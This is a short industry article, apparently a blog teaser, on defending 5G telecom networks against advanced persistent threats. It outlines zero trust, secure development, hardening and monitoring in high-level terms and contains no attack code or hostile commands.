5G is critical infrastructure that provides the foundation of society, supporting economies, public safety, healthcare, utilities and our everyday lives. Maintaining the security of this infrastructure is becoming increasingly challenging due to the evolution of advanced persistent threats (APTs). Network operators, as well as the hardware and software suppliers of those networks, should assume the adversary is already in the network—because they are.

The challenge

The challenge to secure against APTs is that the external threat actor penetrates through a secure perimeter to become an internal threat actor able to persist and move laterally through the network. This challenge is exacerbated in a multistakeholder deployment, where there could be varying security postures and unclear assignment of responsibilities. Increased due diligence is needed to secure critical infrastructure in open, cloud-native, multivendor deployments.

The response

The telecom industry was already on its path to building secure networks to protect our nation’s mobile critical infrastructure from sophisticated attacks, and recent APT attacks have strengthened the industry’s resolve. The best defense against APTs is to build in security using a multipronged approach based on guidance from U.S. federal agencies:

1. Implement Zero Trust Architecture (ZTA)

ZTA, introduced by the National Institute of Standards and Technology (NIST) in 2020, is a network characteristic that should be implemented end-to-end to eliminate any weak point of entry that can serve as a beachhead to the rest of the network. The primary strength of ZTA is that it protects against external and internal threats as if the adversary is already inside. The U.S. Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) recommend that operators and their suppliers follow the Zero Trust Maturity Model, which implements ZTA in four incremental stages.

2. Follow secure software development processes

Reducing software vulnerabilities with secure software development can mitigate the threat of APTs exploiting vulnerabilities once inside the network. Secure software development best practices have been made publicly available by the Business Software Alliance (BSA), the Open Web Application Security Project (OWASP) and SAFECode. A fundamental practice for secure software development is to have secure consumption of thirdparty software, particularly Free Open Source Software (FOSS) that often is not maintained to be secure.

3. Apply industry best practices for hardening

APT exploitations can be mitigated through vulnerability patching, password hygiene and configuration hardening. Configuration hardening is achieved in two steps: first plan and set the security baseline configuration and then continuously audit for security configuration changes and drift. It is fundamental to maintain the security baseline and necessary to have visibility into any configuration changes that deviate from the baseline. Identity and access management configuration should be a high priority as it is a common attack vector. CISA has provided excellent hardening guidance for securing products, as has the U.S. National Security Agency (NSA).

4. Continuously monitor for visibility

Because APTs appear as internal threat actors, it is necessary to have end-to-end visibility through continuous monitoring of the network, workloads and users. A security management system for operations provides the ability to identify, protect, detect, respond and recover from evolving internal attacks on the microperimeters of each network asset and cloud-native infrastructure. Visibility through continuous logging of access attempts and command execution can leverage AI-based security to enable realtime detection of anomalous behavior and the presence of APTs inside the network.

Learn more about the challenges to network security and get further guidance on how to provide secure, resilient networks. Read the blog